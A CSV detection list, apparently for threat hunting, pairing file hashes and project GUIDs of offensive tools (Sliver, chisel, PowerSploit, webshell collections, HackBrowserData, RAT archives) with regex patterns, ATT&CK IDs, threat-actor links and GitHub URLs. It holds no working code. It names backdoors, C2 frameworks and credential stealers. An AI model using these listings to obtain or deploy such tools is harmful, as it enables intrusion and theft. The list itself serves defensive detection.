"*6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42*",".{0,1000}6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28482"
"*6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073*",".{0,1000}6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#filehash","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","28483"
"*6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed*",".{0,1000}6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28484"
"*6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e*",".{0,1000}6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","28485"
"*6c7b6faf5a493f036e6b69a0f4c9c7f1b86c068a56ce4d8d9a92c8ebde0eae99*",".{0,1000}6c7b6faf5a493f036e6b69a0f4c9c7f1b86c068a56ce4d8d9a92c8ebde0eae99.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#filehash","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","28486"
"*6c7bf018f8117a161751d7a7d3e3a6356763ba65f51db519ad72cdf8168da9e8*",".{0,1000}6c7bf018f8117a161751d7a7d3e3a6356763ba65f51db519ad72cdf8168da9e8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28487"
"*6c875bb7e4b35df7144d52eac30c8e2e1fd2ca0e60edbfbfb60043b75d6f0cc5*",".{0,1000}6c875bb7e4b35df7144d52eac30c8e2e1fd2ca0e60edbfbfb60043b75d6f0cc5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28490"
"*6C8ECB51-EECE-49C3-89EC-CB0AAECCFF7E*",".{0,1000}6C8ECB51\-EECE\-49C3\-89EC\-CB0AAECCFF7E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28492"
"*6c984cacd4950905c61a2c6d962a8a9e63f40d0d9d834b26f453296d25356ce8*",".{0,1000}6c984cacd4950905c61a2c6d962a8a9e63f40d0d9d834b26f453296d25356ce8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28495"
"*6C9CF6A0-C098-4341-8DD1-2FCBA9594067*",".{0,1000}6C9CF6A0\-C098\-4341\-8DD1\-2FCBA9594067.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#GUIDproject","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","28497"
"*6ca3271cea48f57c98eb500056d4164215198af09175d1f88b79189523ae56af*",".{0,1000}6ca3271cea48f57c98eb500056d4164215198af09175d1f88b79189523ae56af.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28498"
"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*",".{0,1000}6CAFC0C6\-A428\-4D30\-A9F9\-700E829FEA51.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","#GUIDproject","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","28500"
"*6cb25fb99c1fc66e8b2f04aa80840355e137f5248f62b53422d3ab055c9e7c00*",".{0,1000}6cb25fb99c1fc66e8b2f04aa80840355e137f5248f62b53422d3ab055c9e7c00.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28501"
"*6cb434e48f7e61714d422dfd0cb46d1afe621090e1b432d5cf0030856f17d42a*",".{0,1000}6cb434e48f7e61714d422dfd0cb46d1afe621090e1b432d5cf0030856f17d42a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28502"
"*6cb8b44918b571059ba3d3fd542a0fd60b2bc850d999d6eafdd80af061818bec*",".{0,1000}6cb8b44918b571059ba3d3fd542a0fd60b2bc850d999d6eafdd80af061818bec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28503"
"*6cbd17824d093c835adebf81d9d2e3c1fd56db6dcec461c1cf72f0e3b5ba52f5*",".{0,1000}6cbd17824d093c835adebf81d9d2e3c1fd56db6dcec461c1cf72f0e3b5ba52f5.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","#filehash","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","28504"
"*6cbd379b042c7b27ba4d446c5cbf755b9991d357895f99076ac0a993f80c4fb9*",".{0,1000}6cbd379b042c7b27ba4d446c5cbf755b9991d357895f99076ac0a993f80c4fb9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28505"
"*6cbe75eb761973426dd29855c69210d047b19883320e6bf912df6edafe4826a9*",".{0,1000}6cbe75eb761973426dd29855c69210d047b19883320e6bf912df6edafe4826a9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28506"
"*6cbf3184ec914574bd0d30126a34ee7e0d26ddbc7ebb8a6fa1fe294825600a5b*",".{0,1000}6cbf3184ec914574bd0d30126a34ee7e0d26ddbc7ebb8a6fa1fe294825600a5b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28507"
"*6cc5645274bdacebf9b7d37b49f7440184722f021e13c407df2f7fc71c2b8e5f*",".{0,1000}6cc5645274bdacebf9b7d37b49f7440184722f021e13c407df2f7fc71c2b8e5f.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","28510"
"*6cc6bd374582e6fe7159dcb2d665fafc657053593ffeafc2f4135cae4e5a89cd*",".{0,1000}6cc6bd374582e6fe7159dcb2d665fafc657053593ffeafc2f4135cae4e5a89cd.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28511"
"*6cc72a74c01d04cf06cca303ba6a584a4261829d88fde64592e5a04cb0a16522*",".{0,1000}6cc72a74c01d04cf06cca303ba6a584a4261829d88fde64592e5a04cb0a16522.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","28512"
"*6cd6746c91e7cbeed9a2abc1b32dc169c5cac487b896033e54f128dd0a960db5*",".{0,1000}6cd6746c91e7cbeed9a2abc1b32dc169c5cac487b896033e54f128dd0a960db5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28513"
"*6cdd4782f5551b4f3005974733eab16d0db8b2b3e385437af8f0791b06d7e431*",".{0,1000}6cdd4782f5551b4f3005974733eab16d0db8b2b3e385437af8f0791b06d7e431.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28514"
"*6ce287235d5d056b96a9a99c3a0ce5a209f43745c1101d8e18bd95ea6e7dee65*",".{0,1000}6ce287235d5d056b96a9a99c3a0ce5a209f43745c1101d8e18bd95ea6e7dee65.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28515"
"*6ce500821488255bc70acd310d8162308fd14a4fa214c79c2d9a354c705de6d7*",".{0,1000}6ce500821488255bc70acd310d8162308fd14a4fa214c79c2d9a354c705de6d7.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","28516"
"*6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2*",".{0,1000}6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28517"
"*6cef3ca27cf61c96477576ca98cd658b0a2b1c06c6628cfc6a36ac7357783738*",".{0,1000}6cef3ca27cf61c96477576ca98cd658b0a2b1c06c6628cfc6a36ac7357783738.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28519"
"*6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a*",".{0,1000}6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28521"
"*6cf9eeb823773e76fa991e6092ee7da5a1310697784381e2d4f74fb9071924d1*",".{0,1000}6cf9eeb823773e76fa991e6092ee7da5a1310697784381e2d4f74fb9071924d1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28522"
"*6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b*",".{0,1000}6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28523"
"*6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061*",".{0,1000}6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28524"
"*6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a*",".{0,1000}6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28526"
"*6d11a3d59602508d435fc3cabba737d7b5d710e2b56b7623e903e59ac3d3f287*",".{0,1000}6d11a3d59602508d435fc3cabba737d7b5d710e2b56b7623e903e59ac3d3f287.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","28528"
"*6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6*",".{0,1000}6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28529"
"*6d36fafede6a64aa20f1581d749024d75bb7d3b9c311c6bf1a3b5a31eefe9581*",".{0,1000}6d36fafede6a64aa20f1581d749024d75bb7d3b9c311c6bf1a3b5a31eefe9581.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28532"
"*6d3a0257132fce02f5dcb7d7ccc7fb73db233daae688ebb01de0129d4b448998*",".{0,1000}6d3a0257132fce02f5dcb7d7ccc7fb73db233daae688ebb01de0129d4b448998.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28533"
"*6d4393769a27fd089c9c9f9a52f59e8275397c1c3b8df8ca7c972a3246cb9392*",".{0,1000}6d4393769a27fd089c9c9f9a52f59e8275397c1c3b8df8ca7c972a3246cb9392.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","28534"
"*6d45c0c6898be7c975f3c985fb13f3de05055884dc73b028cf6014a15059df01*",".{0,1000}6d45c0c6898be7c975f3c985fb13f3de05055884dc73b028cf6014a15059df01.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28535"
"*6d47d0d25502192988e01283d2d2e51e02a8fb9e611b7b8a2f5ccb172ba75483*",".{0,1000}6d47d0d25502192988e01283d2d2e51e02a8fb9e611b7b8a2f5ccb172ba75483.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28537"
"*6d56de09348b53ca55bedaa5fbef8d37da5c65f1c170d4bae3f63771295bbe5c*",".{0,1000}6d56de09348b53ca55bedaa5fbef8d37da5c65f1c170d4bae3f63771295bbe5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28539"
"*6d5aef94f94fcf9b0987102f2b436e37f173e9638b08d1cd45d14132071617db*",".{0,1000}6d5aef94f94fcf9b0987102f2b436e37f173e9638b08d1cd45d14132071617db.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28540"
"*6d5cc4d1a8fcd83a5b3a6468f8e45a702836579926920267b8f320b7a2b82e1c*",".{0,1000}6d5cc4d1a8fcd83a5b3a6468f8e45a702836579926920267b8f320b7a2b82e1c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28541"
"*6d5da6436d72bcdffdb2e5bb5b0b20ada0c23d10c1fef1080795c86e51509fae*",".{0,1000}6d5da6436d72bcdffdb2e5bb5b0b20ada0c23d10c1fef1080795c86e51509fae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28542"
"*6d60cf4588ebcb6070f39b0949841c1ee3cc5f05ed72e2820692d1b53808fdcd*",".{0,1000}6d60cf4588ebcb6070f39b0949841c1ee3cc5f05ed72e2820692d1b53808fdcd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28543"
"*6d6629cbd6d624b1a977decf53adbb0e2fb46a07d8ac7392324572dbafe26d48*",".{0,1000}6d6629cbd6d624b1a977decf53adbb0e2fb46a07d8ac7392324572dbafe26d48.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28546"
"*6D663511-76E4-4D74-9B3E-191E1471C4EF*",".{0,1000}6D663511\-76E4\-4D74\-9B3E\-191E1471C4EF.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#GUIDproject","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","28547"
"*6d6a190059cb9ace0b4e16aace82f752ae57df9b36db03508acb3bb4fabe4d05*",".{0,1000}6d6a190059cb9ace0b4e16aace82f752ae57df9b36db03508acb3bb4fabe4d05.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28549"
